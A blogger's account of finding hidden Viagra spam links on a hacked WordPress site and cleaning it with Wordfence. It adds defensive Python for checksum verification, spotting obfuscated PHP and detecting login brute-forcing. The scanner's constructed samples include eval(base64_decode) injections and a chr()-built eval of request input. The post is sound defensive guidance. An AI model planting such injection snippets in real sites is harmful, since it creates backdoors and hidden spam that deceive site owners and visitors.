How to Stop Your WordPress Site from being Hacked
Stop the press!!!!
My WordPress blog has been hacked! Well at least I am 99% sure it has anyway. Not sure if anyone else noticed but there has been this in the top left hand corner of the page for god knows how long:
I don’t know how long it has been there* because whenever you are logged into WordPress:
- You can’t see it because of the logged-in WordPress admin bar at the top
- I think the code that was hacked in was clever enough not to show this to a logged-in user
So anyway just to clear everything up, I am not peddling Viagra as one of my side hustles, and apologies to everyone who has seen this strange message for the last X days/months!
How to fix your blog if you think you’ve been hacked
Luckily it turned out to be quite easy to fix, but I thought it was worth writing a post about it anyway because it might help others out there who are not sure how to proceed! There is a simple and free plugin called Wordfence** that we can use to see whether any files on the server differ from the original WordPress, plugin and theme versions. Simply follow these steps to check whether you’ve been hacked:
- CHANGE YOUR PASSWORD!!! (Maybe to something more secure than password123 🙂, and if your hosting control panel or FTP account uses the same or a similar password, change that too)
- Go to your WordPress Dashboard -> Plugins -> Add New -> Search for “Wordfence”
- Hit “Install”
- Enter your email address to receive alerts for any future security breaches
- Back up all your files and your database, then update WordPress and all your plugins to the latest versions (back up first so you can roll back if an update goes wrong; even a backup of a hacked site is useful later for comparing what changed)
- Go to the Options tab in Wordfence and make sure the “Scan core files against repository versions for changes” option is ticked, along with “Scan plugin files” and “Scan theme files”
- Go back to the Scan tab in Wordfence, then hit “Start a Wordfence Scan”. Wait a minute or two
That’s it! Now there are three possible outcomes…
No warnings, not hacked: If you get no issues or warnings, the chances are you haven’t been hacked, great!
If you have some warnings though, it means some of your PHP or CSS files differ from the original ones that shipped with WordPress, your plugins and your theme:
Some warnings, not hacked: If you have even minimal technical knowledge, there is every chance you may have made a few updates to your CSS files (for the styling of your blog) or the PHP files (say, to include a plugin or a widget at a certain point on your page that cannot be configured automatically). So just because files have changed doesn’t mean you have 100% been hacked. You now need to use the file change tool to work out whether the file updates are your changes or come from some other malicious source (see below)
Some warnings, hacked: If you are certain that you have never changed any of your files, then unfortunately the chances are that you have been hacked!
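What the Wordfence scan is doing behind the scenes is comparing each core file on your server against a known-good copy and reporting any difference. As an added example (my own code, not Wordfence’s or WordPress’s), the Python below does the same check by hand against a checksum manifest. WordPress publishes MD5 checksums for every core release at https://api.wordpress.org/core/checksums/1.0/?version=VERSION&locale=en_US, which is also what `wp core verify-checksums` uses; to keep this runnable offline it instead builds a tiny fake install with one tampered core file, one missing core file and one file dropped where nothing should be. The file names, contents and the injected `eval(base64_decode(...))` line are all constructed for the demo.

```python
import hashlib
import os
import tempfile

def md5_file(path):
    """MD5 of a file, streamed so large core files do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_install(wp_root, manifest):
    """Compare a WordPress tree against a {relative_path: md5hex} manifest.

    Returns (modified, missing, unexpected): core files whose hash differs,
    core files that have vanished, and files outside wp-content/ that the
    manifest does not know about (a favourite place to drop a backdoor).
    wp-content/ and wp-config.php are site-specific and not in the core
    manifest, so they are skipped rather than reported as unexpected.
    """
    modified, missing, unexpected = [], [], []
    for rel, expected in manifest.items():
        path = os.path.join(wp_root, rel)
        if not os.path.isfile(path):
            missing.append(rel)
        elif md5_file(path) != expected:
            modified.append(rel)
    for dirpath, _dirs, files in os.walk(wp_root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), wp_root).replace(os.sep, "/")
            if rel.startswith("wp-content/") or rel == "wp-config.php" or rel in manifest:
                continue
            unexpected.append(rel)
    return sorted(modified), sorted(missing), sorted(unexpected)

# ---- constructed demo data (not real WordPress files) ----------------------
CLEAN_INDEX = b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n"
CLEAN_HEADER = b"<?php\nrequire __DIR__ . '/wp-load.php';\n"
# The shape of line the post describes: an opaque blob handed to a decoder
# and then executed. This blob only decodes to "echo 'hacked';".
INJECTED_INDEX = CLEAN_INDEX + b"<?php eval(base64_decode('ZWNobyAnaGFja2VkJzs=')); ?>\n"

def build_demo_install(root):
    """Write a tiny fake install with one tampered, one missing and one dropped file."""
    os.makedirs(os.path.join(root, "wp-includes"))
    os.makedirs(os.path.join(root, "wp-content", "themes"))
    files = {
        "index.php": INJECTED_INDEX,                       # core file, tampered
        "wp-blog-header.php": CLEAN_HEADER,                # core file, untouched
        "wp-includes/.cache.php": b"<?php /* dropped */",  # hidden file, not in manifest
        "wp-content/themes/style.css": b"body{}",          # user content, ignored
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    # The manifest lists what a clean install of this (fake) version contains.
    return {
        "index.php": hashlib.md5(CLEAN_INDEX).hexdigest(),
        "wp-blog-header.php": hashlib.md5(CLEAN_HEADER).hexdigest(),
        "wp-settings.php": hashlib.md5(b"").hexdigest(),  # listed, but deleted from disk
    }

def demo():
    """Build the constructed install in a temp dir, verify it, and clean up."""
    with tempfile.TemporaryDirectory(prefix="wp-demo-") as root:
        manifest = build_demo_install(root)
        return verify_install(root, manifest)

if __name__ == "__main__":
    modified, missing, unexpected = demo()
    print("modified core files :", modified)
    print("missing core files  :", missing)
    print("unexpected files    :", unexpected)
```

Two things worth knowing before trusting a clean result. MD5 is fine for this job because the manifest is authoritative and the attacker can only change the file on disk, so any edit shows up as a mismatch; but a clean core is not a clean site, since this only covers the files WordPress itself ships. Plugins and themes need their own comparison (Wordfence’s “Scan plugin files” and “Scan theme files” options, or `wp plugin verify-checksums`), and injected links can equally live in the database (posts, widgets, options), which no file scan will see.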
Using the Wordfence file change tool to see if you have been hacked
Warnings in Wordfence look like this:
The option you want to click on is “See how the file has changed”. You will then get a screen that looks something like this:
As you can see in my case here, the one on the right, my current “live” file on my site, has some weird function compared to the left-hand file, which is the original one that Wordfence is comparing it to (which I assume is stored in some secure database of WordPress files somewhere). This sort of thing should set alarm bells ringing immediately. The random string of letters you can see actually went on for hundreds, if not thousands, of characters, which, to get slightly technical for a moment, led me to believe that there is some sort of string decoding going on, which then perhaps converts that into JavaScript code, which gets injected into my site and creates the malevolent Viagra link. In layman’s terms… they screwed me big time. You B**stards!!!!
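The pattern described above, a long opaque string that gets decoded and then executed, is the standard shape of injected PHP, and it is easy to spot mechanically even without a clean copy to diff against. The scanner below is an added example written for this post; it is not Wordfence’s code. It flags the idioms that droppers chain together: long base64-looking literals, `eval`/`assert` wrapped directly around a decoder, `chr()` concatenation used to spell out a function name, and variable function calls like `$f($x)`. The three PHP snippets it runs over are constructed: a benign theme snippet, an `eval(base64_decode())` injection whose payload only shows its link to visitors who are not logged in (the behaviour the post suspects), and a variant that dodges the direct `eval(base64_decode(` pattern.

```python
import base64
import re

# Functions that turn an opaque string back into code or data.
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13",
            "hex2bin", "strrev", "convert_uudecode")
# Functions that execute a string as PHP.
EXECUTORS = ("eval", "assert", "create_function")

# A quoted literal of 120+ base64-alphabet characters: real code rarely has one.
LONG_OPAQUE = re.compile(r"""['"]([A-Za-z0-9+/=]{120,})['"]""")
# eval(base64_decode(   eval(gzinflate(   @assert(str_rot13(  ...
DECODE_THEN_EXEC = re.compile(
    r"\b(?:%s)\s*\(\s*@?\s*(?:%s)\s*\(" % ("|".join(EXECUTORS), "|".join(DECODERS)))
# $f($x): the function name is built at runtime so grep for 'base64_decode' misses it.
DYNAMIC_CALL = re.compile(r"\$\w+\s*\(\s*\$\w+")
# chr(98).chr(97).chr(115)... spelling out a name one byte at a time.
CHR_CONCAT = re.compile(r"(?:chr\(\d+\)\s*\.\s*){4,}")

def score_php(source):
    """Return a list of (indicator, evidence) pairs found in one PHP source string."""
    hits = []
    for m in LONG_OPAQUE.finditer(source):
        blob = m.group(1)
        hits.append(("long_opaque_string", "%d chars, starts %s..." % (len(blob), blob[:16])))
    m = DECODE_THEN_EXEC.search(source)
    if m:
        hits.append(("decode_then_execute", m.group(0)))
    for m in DYNAMIC_CALL.finditer(source):
        hits.append(("variable_function_call", m.group(0)))
    m = CHR_CONCAT.search(source)
    if m:
        hits.append(("chr_concatenation", m.group(0)[:40] + "..."))
    return hits

# ---- constructed samples (not taken from any real theme or malware) --------
BENIGN = """<?php
function mytheme_setup() {
    add_theme_support('post-thumbnails');
    register_nav_menu('primary', __('Primary Menu', 'mytheme'));
}
add_action('after_setup_theme', 'mytheme_setup');
"""

# The decoded payload prints a hidden link only when nobody is logged in,
# which is why the site owner never saw it from the dashboard.
HIDDEN_LINK_PHP = (
    b"if(!function_exists('is_user_logged_in')||!is_user_logged_in()){"
    b"echo '<div style=\"position:absolute;top:0;left:0\">"
    b"<a href=\"http://example.invalid/\">cheap viagra</a></div>';}"
)
INJECTED_EVAL = '<?php\n$_x = "%s";\neval(base64_decode($_x));\n' % base64.b64encode(HIDDEN_LINK_PHP).decode()

# Same idea, but the decoder name is assembled from chr() calls and invoked
# through a variable, so the eval(base64_decode( pattern never appears.
INJECTED_DYNAMIC = """<?php
$f = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
$g = $f($_REQUEST['q']); @eval($g);
"""

if __name__ == "__main__":
    for name, src in (("benign theme", BENIGN), ("eval injection", INJECTED_EVAL),
                      ("dynamic injection", INJECTED_DYNAMIC)):
        print(name)
        for indicator, evidence in score_php(src):
            print("   ", indicator, "->", evidence)
```

Treat a hit as a reason to read the file, not as proof of compromise: legitimate plugins call `base64_decode`, and variable function calls are how WordPress hooks work, so there will be false positives. The diff against the vendor copy that Wordfence shows is the stronger signal where a vendor copy exists; heuristics like these are for the files nobody can diff for you, such as a hand-built theme.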
Once you are sure you have identified file changes that you haven’t made, all you have to do is hit “Restore the original version of this file”. You need to be careful here because you don’t want to overwrite any deliberate updates you have made and potentially forgotten about! Bear in mind that restoring the file removes the payload but not necessarily the way the attacker got in, so also check the Users screen for administrator accounts you don’t recognise and look through wp-content/uploads for any .php files, which should never be there.
After I restored the 3 files that I identified as not updated by myself, I refreshed the site and the Viagra hack has now thankfully gone!
Future hack prevention
Luckily, the Wordfence plugin also provides lots of great features for future protection, such as protection against attackers trying to brute force your WordPress admin password, blocking of known malicious IP addresses, plus plenty of others! There are many options to set depending on how locked down you want your site to be, but please be sure to read up on the consequences of each one before making things “too secure”, as you don’t want to end up blocking genuine users (or yourself)! If you are not 100% sure what something does, it is best to leave it on the default setting.
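To show what the brute-force protection mentioned above is actually reacting to, here is an added example (my own code, not Wordfence’s) that finds password guessing from the outside, in the web server access log. Wordfence counts failed logins per source inside WordPress; doing it from the log catches the same thing and also guessing aimed at xmlrpc.php, which accepts credentials too and is easy to forget when only the login page is rate-limited. The log format is the common Apache/nginx “combined” format, the threshold is an assumption, and every log line below is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" format; only the fields we need are captured.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
# Both endpoints accept a username and password.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def parse(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FORMAT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }

def find_bruteforcers(lines, max_attempts=5, window_minutes=10):
    """Return {ip: peak_count} for IPs that POST to a login endpoint more than
    max_attempts times within any window_minutes-long span.

    A failed wp-login.php POST returns 200 (the form is re-rendered with an
    error) and a successful one 302, so the status is not the signal; the
    rate of POSTs is.
    """
    window = timedelta(minutes=window_minutes)
    recent = defaultdict(deque)  # ip -> timestamps of POSTs still inside the window
    flagged = {}
    for line in lines:
        rec = parse(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        if len(q) > max_attempts:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged

# Constructed log: a slow guesser (one try every 30 min), a real user logging in
# once, a fast guesser on wp-login.php, and a fast guesser on xmlrpc.php.
SAMPLE_LOG = """\
198.51.100.20 - - [12/Mar/2016:08:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "python-requests/2.9"
198.51.100.20 - - [12/Mar/2016:08:30:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "python-requests/2.9"
198.51.100.20 - - [12/Mar/2016:09:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "python-requests/2.9"
198.51.100.20 - - [12/Mar/2016:09:30:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "python-requests/2.9"
192.0.2.10 - - [12/Mar/2016:09:58:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2890 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2016:09:58:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2016:09:58:11 +0000] "GET /wp-admin/ HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2016:10:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "python-requests/2.9"
203.0.113.7 - - [12/Mar/2016:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:00:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:00:13 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:05:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:05:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:05:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:05:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:05:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:05:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2016:10:30:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "python-requests/2.9"
"""

if __name__ == "__main__":
    print(find_bruteforcers(SAMPLE_LOG.splitlines()))
```

Note what the window does: with the default 10-minute window the slow guesser at 198.51.100.20 is never flagged, because it never exceeds five attempts in any ten minutes; widen the window to three hours and it is. That is the trade-off the post warns about, since a tighter rule catches more guessing but also locks out a genuine user who fumbles a password a few times. Disabling XML-RPC altogether (if nothing you use, such as the mobile app or Jetpack, needs it) removes the second endpoint from the problem entirely.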
Sayonara Hackers!
Well that’s it really! I would just like to make it clear that I am not going to turn this blog into one that starts to write more and more blog posts about blogging (there are plenty of those out there already!), but just thought that this post might help people out there!
Finally, if anyone out there thinks they have been hacked and are not sure what files have been updated, please feel free to drop me a line! I am pretty experienced with PHP so should be able to spot any malicious code for you.
Anyone else out there had their blog hacked before? Did you find it easy to sort out or was it the bane of your life!? Let us know your hacking experiences in the comments! Cheers!
*If anyone can tell me how long it has been there I would be very grateful! (Just out of interest really!?)
**There is a premium paid version but the free one looks good enough to do the job, so I’m sticking with that! 🙂
Discussion (14)
One of my sites was hacked a couple of years ago and it was a complete pain to resolve. I only noticed it when poking around in the source code. They had embedded a load of links to their sites which were hidden so you wouldn’t notice just by looking at the front end.
Wordfence looks good, I might have a closer look! Thanks!
They can be really sneaky can’t they! I forgot to mention it’s free as well (will update the post now actually!) – they do a premium version but the free one looks to do the job well enough so I’m sticking with that 🙂
Hi TFS
I thought the Viagra was an interesting side-hustle of yours and was waiting for you to blog about it lol!
Hahaha! I knew someone would call me out on my failed side hustle, and then trying to pass it off as my site being hacked! Damn you weenie! 🙂
I’ve always dreaded this happening FIREstarter, as I wasn’t sure what I would do, but this sounds like an awesome solution. I was actually in a coffee shop a few weeks ago, using their wifi, and when I logged into my site and clicked some of my own links it took me to some strange, dodgy sites – I panicked, shut down and got the hell out of there! Haven’t seen anything since, but I’m concerned there could be something hiding in my site, waiting to spring on me again. I’m definitely getting the Wordfence!
Thanks FIREstarter, and sorry you had to deal with this, but it’s great you learnt something from it and can share with others!
Public WiFi can get hacked pretty easily I think, although sometimes it could just be a genuine redirect to some payment page or even just a signup page to the free wifi, if you want to carry on using it etc… So maybe it wasn’t malicious in that instance. Still something to watch out for when you are out and about though! If it looks dodgy, don’t click on anything and close the browser as you rightly did!
Hey let’s be honest… it was pretty lucky that all that happened (hopefully…!) was a silly link about Viagra on my site eh! 🙂
Take a look at hosting it with WP Engine, great WordPress host
Thanks Anon! I have got a 2 year hosting deal with iPage but if I ever need to upgrade or change I will check them out.
Hey TFS – Oh crap…I need to do this on my blog like right now. So so sorry you had to deal with this. I’ve had it up to here with hacked sites and dirty wifi and all that. Thanks for your advice, will get on it!!
Very quick follow-up – Wordfence was SUPER EASY to install and run. Had one minor issue with a file that got changed for Bluehost’s benefit but nothing of concern. Just flipped it back to the vanilla version and was totally fine.
Thanks TFS!!
Hi Mr FC. No problems and thanks for commenting.
Just a quick note… if you know why a file has changed you don’t HAVE to change it back. The idea is only to revert file changes that look dodgy, or you have no idea where the change came from or why it has changed. Bit of a balancing act I know (I am also sure that the bluehost thing wasn’t that important 🙂 )
You can also use the “limit logon attempts” in WordPress / Settings / Limit Logon Attempts. Set it to a really low number with a long time period in between. Also change the default WP admin account from “admin”, strong password, etc, etc.
Don’t know about you but my comments get spammed to heck so I use AntiSpam Bee and now everything just gets directed to spam – I don’t even review it anymore
Thanks for the extra tips Mr S!
WordFence also has the login attempts settings with a few extra config options as well, so you can do it all in one place there.
Good point about changing the default account name, I hadn’t thought to do that!
I use Anti Spam Bee as well, the other big one out there is Akismet.
Don’t think those will stop you from getting hacked, but it stops all the comment Spam, which gets ridiculous quite quickly doesn’t it! And yep not worth checking, if someone has written a decent comment and it hasn’t shown up, they will normally email in and you can go and unspam it (this happened to me recently with Akismet!)